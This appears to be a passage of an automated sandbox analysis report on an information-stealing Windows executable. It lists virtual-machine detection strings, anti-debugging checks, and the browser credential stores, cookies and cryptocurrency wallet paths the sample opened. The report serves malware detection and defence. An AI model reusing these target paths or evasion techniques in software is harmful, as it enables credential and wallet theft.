                    Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                    Source: Amcache.hve.8.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                    Source: Amcache.hve.8.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.8.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.8.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.8.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.8.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.8.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                    Source: Amcache.hve.8.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.8.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                    Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.8.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
                    Source: Amcache.hve.8.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                    Source: Amcache.hve.8.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                    Source: Amcache.hve.8.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeAPI call chain: ExitProcess graph end nodegraph_0-73723

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_004244E4 NtSetInformationThread 000000FE,00000011,00000000,00000000,?,?,?,?,?,0041EC640_2_004244E4
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_0-73808
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeSystem information queried: KernelDebuggerInformationJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeProcess queried: DebugObjectHandleJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeProcess queried: DebugFlagsJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00429EF7 rdtsc 0_2_00429EF7
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0044E33B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0044E33B
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0041F9A4 GetCurrentProcessId,NtDuplicateObject,NtClose,GetProcessId,NtQuerySystemInformation,NtQuerySystemInformation,0_2_0041F9A4
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00422177 mov eax, dword ptr fs:[00000030h]0_2_00422177
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00443998 mov ecx, dword ptr fs:[00000030h]0_2_00443998
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0041F9A4 mov eax, dword ptr fs:[00000030h]0_2_0041F9A4
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_004262A1 mov eax, dword ptr fs:[00000030h]0_2_004262A1
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0043B362 mov eax, dword ptr fs:[00000030h]0_2_0043B362
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0044FB15 mov eax, dword ptr fs:[00000030h]0_2_0044FB15
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_004244E4 mov eax, dword ptr fs:[00000030h]0_2_004244E4
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_004224A3 mov eax, dword ptr fs:[00000030h]0_2_004224A3
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_004245EC mov eax, dword ptr fs:[00000030h]0_2_004245EC
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00421EEB mov eax, dword ptr fs:[00000030h]0_2_00421EEB
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00422817 mov eax, dword ptr fs:[00000030h]0_2_00422817
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0041F916 mov eax, dword ptr fs:[00000030h]0_2_0041F916
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_004269E4 mov eax, dword ptr fs:[00000030h]0_2_004269E4
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00424995 mov eax, dword ptr fs:[00000030h]0_2_00424995
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00424995 mov eax, dword ptr fs:[00000030h]0_2_00424995
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00426A42 mov eax, dword ptr fs:[00000030h]0_2_00426A42
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0042F265 mov eax, dword ptr fs:[00000030h]0_2_0042F265
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00424B24 mov eax, dword ptr fs:[00000030h]0_2_00424B24
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0041EBEB mov eax, dword ptr fs:[00000030h]0_2_0041EBEB
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00424BED mov eax, dword ptr fs:[00000030h]0_2_00424BED
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00424C8D mov eax, dword ptr fs:[00000030h]0_2_00424C8D
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0041E6F0 mov eax, dword ptr fs:[00000030h]0_2_0041E6F0
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00429EF7 mov eax, dword ptr fs:[00000030h]0_2_00429EF7
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008A4853 mov eax, dword ptr fs:[00000030h]0_2_008A4853
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0088092B mov eax, dword ptr fs:[00000030h]0_2_0088092B
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008AA15E mov eax, dword ptr fs:[00000030h]0_2_008AA15E
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008A2152 mov eax, dword ptr fs:[00000030h]0_2_008A2152
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0089E957 mov eax, dword ptr fs:[00000030h]0_2_0089E957
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008A2A7E mov eax, dword ptr fs:[00000030h]0_2_008A2A7E
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008A23DE mov eax, dword ptr fs:[00000030h]0_2_008A23DE
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008C3BFF mov ecx, dword ptr fs:[00000030h]0_2_008C3BFF
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008A4BFC mov eax, dword ptr fs:[00000030h]0_2_008A4BFC
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008A4BFC mov eax, dword ptr fs:[00000030h]0_2_008A4BFC
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0089FB7D mov eax, dword ptr fs:[00000030h]0_2_0089FB7D
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008A6CA9 mov eax, dword ptr fs:[00000030h]0_2_008A6CA9
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008AF4CC mov eax, dword ptr fs:[00000030h]0_2_008AF4CC
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0089FC0B mov eax, dword ptr fs:[00000030h]0_2_0089FC0B
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008A6C4B mov eax, dword ptr fs:[00000030h]0_2_008A6C4B
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008A4D8B mov eax, dword ptr fs:[00000030h]0_2_008A4D8B
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00880D90 mov eax, dword ptr fs:[00000030h]0_2_00880D90
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008BB5C9 mov eax, dword ptr fs:[00000030h]0_2_008BB5C9
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008A6508 mov eax, dword ptr fs:[00000030h]0_2_008A6508
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008CFD7C mov eax, dword ptr fs:[00000030h]0_2_008CFD7C
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008A4EF4 mov eax, dword ptr fs:[00000030h]0_2_008A4EF4
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0089EE52 mov eax, dword ptr fs:[00000030h]0_2_0089EE52
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008A4E54 mov eax, dword ptr fs:[00000030h]0_2_008A4E54
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008A270A mov eax, dword ptr fs:[00000030h]0_2_008A270A
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008A474B mov eax, dword ptr fs:[00000030h]0_2_008A474B
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00979B5B push dword ptr fs:[00000030h]0_2_00979B5B
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0043323B GetProcessHeap,CreateDCW,GetSystemMetrics,GetSystemMetrics,DeleteDC,0_2_0043323B
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0044E33B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0044E33B
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0043D3A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0043D3A0
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0043CE89 SetUnhandledExceptionFilter,0_2_0043CE89
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0043CE95 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0043CE95
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008BD0FC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008BD0FC
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008BD0F0 SetUnhandledExceptionFilter,0_2_008BD0F0
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008CE5A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008CE5A2
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008BD607 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_008BD607
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0043D0B8 cpuid 0_2_0043D0B8
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0044614F GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_0044614F
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00402476 GetComputerNameW,GetUserNameW,0_2_00402476
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00453BC4 GetTimeZoneInformation,0_2_00453BC4
                    Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.8.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.8.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                    Source: Amcache.hve.8.drBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.3.OlZzqwjrwO.exe.8f0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.OlZzqwjrwO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.OlZzqwjrwO.exe.8f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.OlZzqwjrwO.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1340247273.00000000008F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: OlZzqwjrwO.exe PID: 7712, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: OlZzqwjrwO.exeString found in binary or memory: %appdata%\Electrum\wallets
                    Source: OlZzqwjrwO.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                    Source: OlZzqwjrwO.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: OlZzqwjrwO.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3108751929.000000000334D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Binance,(B
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3108751929.000000000334D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum
                    Source: OlZzqwjrwO.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000314C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystoreD+
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3108751929.000000000334D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ledger Live
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENTJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcoblJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.jsonJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.dbJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflalJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmlJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfelJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001Jump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOGJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ca4gppea.default\key4.dbJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
